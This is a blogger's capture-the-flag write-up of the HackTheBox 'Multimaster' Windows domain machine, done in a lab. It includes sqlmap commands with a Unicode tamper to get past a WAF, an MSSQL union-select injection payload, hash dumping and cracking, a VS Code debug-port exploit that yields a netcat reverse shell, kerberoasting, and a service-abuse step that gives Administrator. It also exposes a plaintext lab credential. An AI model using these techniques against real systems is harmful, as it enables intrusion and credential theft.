[Updated] HackTheBox Multimaster Writeup – 10.10.10.179

HackTheBox Multimaster – 10.10.10.179 is insanely difficult Windows machine by MinatoTW & egre55 released on 7th March.

The MultiMaster machine can simply categorize as one of the hardest machines of HTB. The machine needs a lot of time enumerate and understand how the things work. One need to be patience while working on this machine. I took almost 8 to 9 days to complete the machine. And the time I spent was really worth of it, I learned a lot.

HackTheBox Multimaster Writeup - 10.10.10.179
HackTheBox Multimaster Writeup – 10.10.10.179

The machine Cascade was released after MultiMaster, I decided to work on Cascade as it is an easy one. After publishing Cascade Writeup a couple of few days ago, I started working on the Multimaster. I’m in fact preparing this writeup long with my progress on the machine. I normally prepare notes and re-do the machine while preparing writeup. But the Multimaster is insane, I thought to write the work on the machine and write the blog so here I present you my Multimaster writeup.

Important Note: I skipped a couple of steps where I thought necessary to confuse freebie flag takers. If you legitimately root this machine, obviously you know the steps I missed and you know the way I exploited it. 🙂

NMAP SCAN

As usual, I add the machine IP 10.10.10.179 to my hosts file as multimaster.htb. Next is to scan open ports and services using NMAP.


# root @ ns09 in ~/htb/multimaster [21:07:40] 
$ nmap -sC -A -v -oA scan multimaster.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 21:07 +03
Scanning multimaster.htb (10.10.10.179) [4 ports]
Completed Ping Scan at 21:07, 0.33s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:07
Scanning multimaster.htb (10.10.10.179) [1000 ports]
Discovered open port 3389/tcp on 10.10.10.179
Discovered open port 53/tcp on 10.10.10.179
Discovered open port 445/tcp on 10.10.10.179
Discovered open port 139/tcp on 10.10.10.179
Discovered open port 80/tcp on 10.10.10.179
Discovered open port 135/tcp on 10.10.10.179
Discovered open port 3269/tcp on 10.10.10.179
Discovered open port 88/tcp on 10.10.10.179
Discovered open port 389/tcp on 10.10.10.179
Discovered open port 636/tcp on 10.10.10.179
Discovered open port 3268/tcp on 10.10.10.179
Discovered open port 464/tcp on 10.10.10.179
Discovered open port 593/tcp on 10.10.10.179
Completed SYN Stealth Scan at 21:08, 26.90s elapsed (1000 total ports)
Initiating Service scan at 21:08
Scanning 13 services on multimaster.htb (10.10.10.179)
Completed Service scan at 21:10, 152.08s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against multimaster.htb (10.10.10.179)
Retrying OS detection (try #2) against multimaster.htb (10.10.10.179)
Initiating Traceroute at 21:11
Completed Traceroute at 21:11, 0.24s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:11
Completed Parallel DNS resolution of 2 hosts. at 21:11, 0.01s elapsed
NSE: Script scanning 10.10.10.179.
Initiating NSE at 21:11
[2]    2296 segmentation fault  nmap -sC -A -v -oA scan multimaster.htb

As soon as the NMAP results are up, I understood this machine is different from most of the HackTheBox Windows Machines. The NMAP result says there are regular Windows AD related ports including 3389, 3268, 445, 88,593, 80 are open. The AD Domain is MEGACORP.LOCAL and the machine seems to be Windows Server 2016 STD.

Port 80

Upon checking the website on port 80, turns out to be an Employee Hub of a company MegaCorp. There is a Gallery page, Colleague finder that returns the name and email address of the employees, corporate calendar and a login button that doesn’t work.

As I mentioned above, I was guessing right, this machine is not like previous Windows machine those initial foothold was probably by one of Impacket tool or gathering usernames from website etc. I try to run Enum4Linux but the information returned was very less. I run the WFUZZ but I couldn’t find anything useful.

Since the list wasn’t clear and source code didn’t seem to give a way, I decided to run Burp Suit and get the users list from there, hoping to get more info if possible.

OK, much better now. After intercepting the request and sending blank names, I got the better list of 17 users.

[{"id":1,"name":"Sarina Bauer","position":"Junior Developer","email":"sbauer@megacorp.htb","src":"sbauer.jpg"},{"id":2,"name":"Octavia Kent","position":"Senior Consultant","email":"okent@megacorp.htb","src":"okent.jpg"},{"id":3,"name":"Christian Kane","position":"Assistant Manager","email":"ckane@megacorp.htb","src":"ckane.jpg"},{"id":4,"name":"Kimberly Page","position":"Financial Analyst","email":"kpage@megacorp.htb","src":"kpage.jpg"},{"id":5,"name":"Shayna Stafford","position":"HR Manager","email":"shayna@megacorp.htb","src":"shayna.jpg"},
{"id":6,"name":"James Houston","position":"QA Lead","email":"james@megacorp.htb","src":"james.jpg"},
{"id":7,"name":"Connor York","position":"Web Developer","email":"cyork@megacorp.htb","src":"cyork.jpg"},
{"id":8,"name":"Reya Martin","position":"Tech Support","email":"rmartin@megacorp.htb","src":"rmartin.jpg"},
{"id":9,"name":"Zac Curtis","position":"Junior Analyst","email":"zac@magacorp.htb","src":"zac.jpg"},
{"id":10,"name":"Jorden Mclean","position":"Full-Stack Developer","email":"jorden@megacorp.htb","src":"jorden.jpg"},{"id":11,"name":"Alyx Walters","position":"Automation Engineer","email":"alyx@megacorp.htb","src":"alyx.jpg"},{"id":12,"name":"Ian Lee","position":"Internal Auditor","email":"ilee@megacorp.htb","src":"ilee.jpg"},
{"id":13,"name":"Nikola Bourne","position":"Head of Accounts","email":"nbourne@megacorp.htb","src":"nbourne.jpg"},{"id":14,"name":"Zachery Powers","position":"Credit Analyst","email":"zpowers@megacorp.htb","src":"zpowers.jpg"},{"id":15,"name":"Alessandro Dominguez","position":"Senior Web Developer","email":"aldom@megacorp.htb","src":"aldom.jpg"},{"id":16,"name":"MinatoTW","position":"CEO","email":"minato@megacorp.htb","src":"minato.jpg"},{"id":17,"name":"egre55","position":"CEO","email":"egre55@megacorp.htb","src":"egre55.jpg"}]

After a lot of trial and error, I noticed the application WAF can be bypassed using Unicode Escape characters . I was able to bypass the WAF using few Unicode characters like \u0041, \u0042, \u0025, \u0100.

So that means the application can be exploited using SQL injection using tampering SQLMAP charunicodeencode. As per HTB forum posts the first approach is to get the user credentials in hash and get it cracked using the SQLMAP.

But I’m uncertain where to start or what is my point of attack. After looking here and there and reading a couple articles and getting a tip from TazWake I was able to create a perfect SQLMAP command.

As advised by TazWake, I made sure to update my tamper script charunicodeencode.py to have Unicode payload.

Unicode escape character converter I used: https://dencode.com/en/string/unicode-escape

GETTING DATABASE AND TABLE NAMES

I made a fresh burp POST request and copy the request in to a text file and used it with the SQLMAP. To find Database I used the following:

# root @ ns09 in ~/htb/multimaster [12:25:09] 
$ sqlmap -r target.txt --tamper charunicodeencode --dbs -delay 5 
---
sqlmap -r target.txt --tamper charunicodeencode -D Hub_DB --tables -delay 5

Well SQLMAP took sometime and finally I have the Database name (Hub_DB) I made a same request but this time to obtain table names.

OBTAINING USER CREDENTIALS IN HASHES

The waiting was real painful, since the WAF blocks too many requests and the exploit will fail. So I add the delay 3 to avoid WAF blocking my attacks.

SQLMAP COMMAND:

sqlmap --tamper charunicodeencode --dbms=mssql -D Hub_DB -T Logins -C username,password --dump -r target.txt -delay 3

After waiting like 4 hours in my first attempt I obtained following hashes. The screenshot was taken while writing this blog post, I stopped the attack to continue writing. There were in total 17 hashes and I found out of 17; 4 are unique.

fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739

I used HASHCAT to crack the password:

And another couple minutes to crack the hash and get the password. However, the password didn’t authenticate with any of 17 users I have enumerated in previous attempts. It means the users are useless as of now.

I did a lot of trails and errors again until I managed to find required domain users. 2 service accounts and 7 users.

After reading a bunch of blog posts and nudges from HTB users, I understood that, I need to get SID of the domain. So back to BURP to generate SID using the users I already have.

So back to https://www.branah.com/unicode-converter and using the payload (below) I managed to get the SID of the domain MEGAMASTER.HTB

-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, ')))-- -

Converted Unicode:

I sent the request using BRUP and here is the response with Domain SID: 0x0105000000000005150000001C00D1BCD181F1492BDFC236

Along with a couple of HTB friends on discord we made a script to get domain users using the SID we just gathered.

$ python cracker.py
0x0105000000000005150000001C00D1BCD181F1492BDFC2364D040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\DnsAdmins"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2364E040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\DnsUpdateProxy"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2364F040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\svc-nas"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23651040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\Privileged IT Accounts"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23656040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\tushikikatomo"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23657040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\andrew"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23658040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\lana"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23635080000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\dai"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23636080000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\svc-sql"}]
403 - Forbidden: Access is denied
403 - Forbidden: Access is denied
403 - Forbidden: Access is denied
0x0105000000000005150000001C00D1BCD181F1492BDFC2361D0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\SQLServer2005SQLBrowserUser$MULTIMASTER"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2361E0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\sbauer"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2361F0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\okent"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236200C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\ckane"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236210C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\kpage"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236220C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\james"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236230C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\cyork"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236240C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\rmartin"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236250C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\zac"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236260C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\jorden"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236270C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\alyx"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236280C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\ilee"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236290C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\nbourne"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2362A0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\zpowers"}]
Done Cracking

I made a list of users:

  • MEGACORP\DnsAdmins
  • MEGACORP\DnsUpdateProxy
  • MEGACORP\svc-nas
  • MEGACORP\Privileged IT Accounts
  • MEGACORP\tushikikatomo
  • MEGACORP\andrew
  • MEGACORP\lana
  • MEGACORP\dai
  • MEGACORP\svc-sql
  • MULTIMASTER
  • MEGACORP\sbauer
  • MEGACORP\okent
  • MEGACORP\ckane
  • MEGACORP\kpage
  • MEGACORP\james
  • MEGACORP\cyork
  • MEGACORP\rmartin
  • MEGACORP\zac
  • MEGACORP\jorden
  • MEGACORP\alyx
  • MEGACORP\ilee
  • MEGACORP\nbourne
  • MEGACORP\zpowers

Getting Users.txt Using Evil-WinRM

Once I have the AD users list it was just a matter of minutes to find user.txt file. Out of 9 users the password “******1” paired with user tushikikatomo.

Credentials to use in Evil-WinRM:

tushikikatom:************1

AND finally after a long battle, I’ve obtained the user.txt. It was a great machine so far and the machine is a great learning tool for AD exploit using SQLi, there are a couple of things I enjoyed which I had never tried.

ON TO THE ROOT

As soon as I obtained the user, my next step was to see what user tushikikatom is able to perform in the MultiMaster system. I started to enumerate the system to find Groups, users and running services in the box.

First thing to do after getting low-priv user: Perform a WHOAMI /ALL from whatever shell you got and note down the membership and privilege information your compromised user have.

Users:


# root @ ns09 in ~/htb/multimaster [14:50:51] 
$ ruby evil-winrm.rb -i multimaster.htb -u tushikikatomo -p *********
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alcibiades\Documents> Get-ADUser -Filter * -SearchBase "DC=MEGACORP,DC=LOCAL"
DistinguishedName : CN=Administrator,CN=Users,DC=MEGACORP,DC=LOCAL
Enabled           : True
GivenName         : 
Name              : Administrator
ObjectClass       : user
ObjectGUID        : 6c5bda1d-9908-40d8-b5f2-43b2000f7c75
SamAccountName    : Administrator
SID               : S-1-5-21-3167813660-1240564177-918740779-500
Surname           : 
UserPrincipalName : 
DistinguishedName : CN=Guest,CN=Users,DC=MEGACORP,DC=LOCAL
Enabled           : False
GivenName         : 
Name              : Guest
ObjectClass       : user
ObjectGUID        : 567071d7-37a9-475c-8f78-5eb3811da155
SamAccountName    : Guest
SID               : S-1-5-21-3167813660-1240564177-918740779-501
Surname           : 
UserPrincipalName : 
DistinguishedName : CN=DefaultAccount,CN=Users,DC=MEGACORP,DC=LOCAL
Enabled           : False
GivenName         : 
Name              : DefaultAccount
ObjectClass       : user
ObjectGUID        : 1d1114eb-b5d1-486a-b7dd-0d85c5ebaebb
SamAccountName    : DefaultAccount
SID               : S-1-5-21-3167813660-1240564177-918740779-503
Surname           : 
UserPrincipalName : 
----------------snip-------------
DistinguishedName : CN=Penelope Martin,OU=Frankfurt,OU=Employees,DC=MEGACORP,DC=LOCAL
Enabled           : True
GivenName         : Penelope
Name              : Penelope Martin
ObjectClass       : user
ObjectGUID        : 72b44502-30e3-4e13-9a37-ebf8fc14ad1d
SamAccountName    : pmartin
SID               : S-1-5-21-3167813660-1240564177-918740779-3117
Surname           : Martin
UserPrincipalName : pmartin@MEGACORP.LOCAL

Once I have the list of users, I proceed to see the residing groups in the AD.

# root @ ns09 in ~/htb/multimaster [14:55:06] 
$ ruby evil-winrm.rb -i multimaster.htb -u tushikikatomo -p ********
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alcibiades\Documents> get-adgroup -Filter *
DistinguishedName : CN=Administrators,CN=Builtin,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Administrators
ObjectClass       : group
ObjectGUID        : e9d6125c-fce6-4b52-9058-201c781d1ed4
SamAccountName    : Administrators
SID               : S-1-5-32-544
DistinguishedName : CN=Users,CN=Builtin,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Users
ObjectClass       : group
ObjectGUID        : a84ef90f-cbbc-4b25-b5cb-6d0763e02ce2
SamAccountName    : Users
SID               : S-1-5-32-545
=============SNIP====================
DistinguishedName : CN=test,OU=Groups,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : Global
Name              : test
ObjectClass       : group
ObjectGUID        : faa08fa3-e051-4ca8-9ce2-cf06c91221d4
SamAccountName    : test
SID               : S-1-5-21-3167813660-1240564177-918740779-1602
DistinguishedName : CN=SQLServer2005SQLBrowserUser$MULTIMASTER,CN=Users,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : SQLServer2005SQLBrowserUser$MULTIMASTER
ObjectClass       : group
ObjectGUID        : d7ae6cab-8447-4623-839c-e9dc3044fbd4
SamAccountName    : SQLServer2005SQLBrowserUser$MULTIMASTER
SID               : S-1-5-21-3167813660-1240564177-918740779-3101
DistinguishedName : CN=Developers,OU=Groups,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : Global
Name              : Developers
ObjectClass       : group
ObjectGUID        : 3a87c5ff-b156-4898-ad10-284489e07c15
SamAccountName    : Developers
SID               : S-1-5-21-3167813660-1240564177-918740779-3119

So now I have the users and the group names in the box. This will give me an idea of services running and I can enumerate further who is who and who is capable of running what. After enumerating one by one I found most of them are just default groups without any members.

SamAccountName    : Users
SamAccountName    : Guests
SamAccountName    : Print Operators
SamAccountName    : Backup Operators
SamAccountName    : Replicator
SamAccountName    : Remote Desktop Users
SamAccountName    : Network Configuration Operators
SamAccountName    : Performance Monitor Users
SamAccountName    : Performance Log Users
SamAccountName    : Distributed COM Users
SamAccountName    : IIS_IUSRS
SamAccountName    : Cryptographic Operators
SamAccountName    : Event Log Readers
SamAccountName    : Certificate Service DCOM Access
SamAccountName    : RDS Remote Access Servers
SamAccountName    : RDS Endpoint Servers
SamAccountName    : RDS Management Servers
SamAccountName    : Hyper-V Administrators
SamAccountName    : Access Control Assistance Operators
SamAccountName    : Remote Management Users
SamAccountName    : System Managed Accounts Group
SamAccountName    : Storage Replica Administrators
SamAccountName    : Domain Computers
SamAccountName    : Domain Controllers
SamAccountName    : Schema Admins
SamAccountName    : Enterprise Admins
SamAccountName    : Cert Publishers
SamAccountName    : Domain Admins
SamAccountName    : Domain Users
SamAccountName    : Domain Guests
SamAccountName    : Group Policy Creator Owners
SamAccountName    : RAS and IAS Servers
SamAccountName    : Server Operators
SamAccountName    : Account Operators
SamAccountName    : Pre-Windows 2000 Compatible Access
SamAccountName    : Incoming Forest Trust Builders
SamAccountName    : Windows Authorization Access Group
SamAccountName    : Terminal Server License Servers
SamAccountName    : Allowed RODC Password Replication Group
SamAccountName    : Denied RODC Password Replication Group
SamAccountName    : Read-only Domain Controllers
SamAccountName    : Enterprise Read-only Domain Controllers
SamAccountName    : Cloneable Domain Controllers
SamAccountName    : Protected Users
SamAccountName    : Key Admins
SamAccountName    : Enterprise Key Admins
SamAccountName    : DnsAdmins
SamAccountName    : DnsUpdateProxy
SamAccountName    : Privileged IT Accounts
SamAccountName    : test
SamAccountName    : SQLServer2005SQLBrowserUser$MULTIMASTER
SamAccountName    : Developers

In the next step, I try to gather as much as information about the group membership, most of the default groups having Administrator as members but group “Developers” seem to be a custom group with members “aldom, cyork, jorden and sbauer”.

*Evil-WinRM* PS C:\Users\alcibiades\Documents> Get-ADGroupMember Developers
distinguishedName : CN=Sarina Bauer,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Sarina Bauer
objectClass       : user
objectGUID        : 548955df-e515-41c1-9afa-8130103570e2
SamAccountName    : sbauer
SID               : S-1-5-21-3167813660-1240564177-918740779-3102
distinguishedName : CN=Connor York,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Connor York
objectClass       : user
objectGUID        : 6c3c78ec-7e0a-48be-95d7-edd410457515
SamAccountName    : cyork
SID               : S-1-5-21-3167813660-1240564177-918740779-3107
distinguishedName : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Jorden Mclean
objectClass       : user
objectGUID        : 0fa62545-eff1-4805-b16f-a18cf4217418
SamAccountName    : jorden
SID               : S-1-5-21-3167813660-1240564177-918740779-3110
distinguishedName : CN=Alessandro Dominguez,OU=London,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Alessandro Dominguez
objectClass       : user
objectGUID        : 0d1589a0-e3ae-431b-8568-b99922fdc40f
SamAccountName    : aldom
SID               : S-1-5-21-3167813660-1240564177-918740779-3115

After more enum, I found user “Jordan” is as well member of “Server Operators” group, it means he’s probably has Administrator privilege.

*Evil-WinRM* PS C:\Users\alcibiades\Documents> Get-ADGroupMember "Server Operators"
distinguishedName : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Jorden Mclean
objectClass       : user
objectGUID        : 0fa62545-eff1-4805-b16f-a18cf4217418
SamAccountName    : jorden
SID               : S-1-5-21-3167813660-1240564177-918740779-3110
distinguishedName : CN=Privileged IT Accounts,OU=Groups,DC=MEGACORP,DC=LOCAL
name              : Privileged IT Accounts
objectClass       : group
objectGUID        : 8504e2e0-c303-4043-a1f2-a2f591341e5e
SamAccountName    : Privileged IT Accounts
SID               : S-1-5-21-3167813660-1240564177-918740779-1105

The more I started enumerating more I lost, from the posts in forum and private Discord forum, I found that the box is vulnerable to VS code LCE (Local Command Execution). I as well confirmed with fellow HTB users @maaaaaa and @peek. The huge task in front of me was to find the PoC of this vulnerability.

From PowerShell, I managed to gather Code process information:

This machine is so frustrating that I actually held myself back for another 3 days without making much progress on Friday, Saturday and Sunday. But finally, I found the exploit most of HTB users talking about. It is the exploit by Francesco Soncina that exploits the Visual Studio Code through executing the arbitrary commands by connecting to the debug port. This exploit was awarded with CVE CVE-2019-1414 by Microsoft.

After going through the post, I figured out how the exploit works. The exploit need a little trimming in order to execute it as per my requirement. Also, the exploit works in the way that debug port binds to 127.0.0.1. So the exploit need to be run from the Multimaster system itself.

I host a Python SimpleHTTPServer Multimaster working directory and placed my Netcat there. I update the SpawnSync expression as per below code block. And from other hand I upload the updated script to Multimaster box using MSFconsole, and when all set I execute the script. The exploit didn’t work initially as I had issues in my SpawnSync, I took time to redo the script and rerun and as you see below I have the reverse shell as MS VS Code.

As I got the shell, I started to enum the wwwroot directory, I assumed that the web.config file should have a database connection info and possibly Super user password. However, I was able to read the web.config but I couldn’t find anything useful.

My enum continued until I found APIs, I read somewhere in HTB forum, the BIN directory supposed to have something useful. So I decided to download following two files and review.

  • MultimasterAPI.dll
  • MultimasterAPI.pbd

Downloading files:

After downloading the file, I used dnSpy to decompile the DLL. The API’s Http Post class has a user name and password.

finder:D3veL0pM3nT!

The username finder didn’t get me the Evil-WinRM shell, after matching the password with the other users I got shell from the username sbauer.

After spending a lot of time on SBauer and analysing I understood the user SBauer is nothing but just a gateway to the root, I need to find a right user and privilege escalation of my current user.

In the next step I was pretty much looking for help and collecting information here and there. A fellow Discord user suggested me to upload SharpHound.ps1and analyse, after analysing I found that the use SBauer has the generic write access to another Jorden.

Next, it was just straightforward execute SharpHound and run kerberoast attack. Using PowerView PowerShell script I was able to obtain hashes of the user Jorden. The hash was later cracked as password “r*********

Evil-WinRM to Shell The User Jorden

I opened another session of Evil-WinRm to get reverse shell of the user Jorden. The permission check revealed the user Jorden is a member of security group “Server Operators“”

SMB Server

I host an SMB server from the MultiMaster working directory where I placed the Netcat.

NetCat Listner

I made a listener on a random port

So from Jorden I found the service that can be exploited, I referred this article and I use the netcat as payload. When the service is restarted, boom I have a reverse shell as Administrator in the listener.

That’s it, I’m so revealed after completing this box. Thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
1 Comment
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
JJChang
JJChang
1 month ago

hi man, how you make SpawnSync execute your local nc.exe? I can’t make it work.

Sorry, that action is blocked.